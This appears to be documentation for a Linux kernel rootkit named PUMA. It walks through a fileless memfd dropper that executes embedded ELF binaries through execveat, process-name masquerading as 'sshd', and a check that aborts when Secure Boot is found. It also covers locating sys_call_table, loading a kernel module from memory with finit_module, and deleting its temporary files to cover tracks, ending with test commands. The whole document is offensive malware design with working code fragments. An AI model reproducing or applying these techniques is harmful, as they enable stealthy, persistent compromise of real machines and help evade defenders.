Stage 1: Fileless Memfd Dropper link

1. We call

     fd_loader = memfd_create("loader", MFD_CLOEXEC);
   fd_target = memfd_create("target", MFD_CLOEXEC);
     

   to get two anonymous file descriptors.
2. We write() our embedded ELF blobs into each fd.
3. We fork():
   • Child: redirect stdout/stderr to /dev/null, then

       execveat(fd_loader, NULL, argv_loader, envp, AT_EMPTY_PATH);
       

   • Parent: waitpid(), then

       execveat(fd_target, NULL, argv_target, envp, AT_EMPTY_PATH);
       

execveat(..., AT_EMPTY_PATH) lets us execute a program by FD without any filename on disk.

Stage 2: Environment-Aware Loader link

1. We rename our process to “sshd” via

     prctl(PR_SET_NAME, "sshd", 0, 0, 0);
     

2. We scan dmesg for “Secure boot” strings. If found, we abort.
3. We drop a helper script /tmp/loader.sh that:
   • Uses file + grep to detect gzip/xz/bz2/lz4/zstd.
   • Runs tail -c +<offset> + the right decompressor → /tmp/vmlinux.
4. In loader.c, we open /tmp/vmlinux and call:

     sys_call_table = (void **)kallsyms_lookup_name("sys_call_table");
     

5. We load our kernel module by creating another memfd for puma.ko and calling:

     finit_module(fd_puma_ko, "", 0);
     

6. Finally, we remove /tmp/loader.sh and /tmp/vmlinux.

Code Locations link

• rootkit/dropper/dropper.c
• rootkit/loader/loader.c & rootkit/loader/loader.sh

Quick Test link

  ./rootkit/dropper/cron
dmesg | grep "PUMA is compatible"
dmesg | grep "PUMA loaded"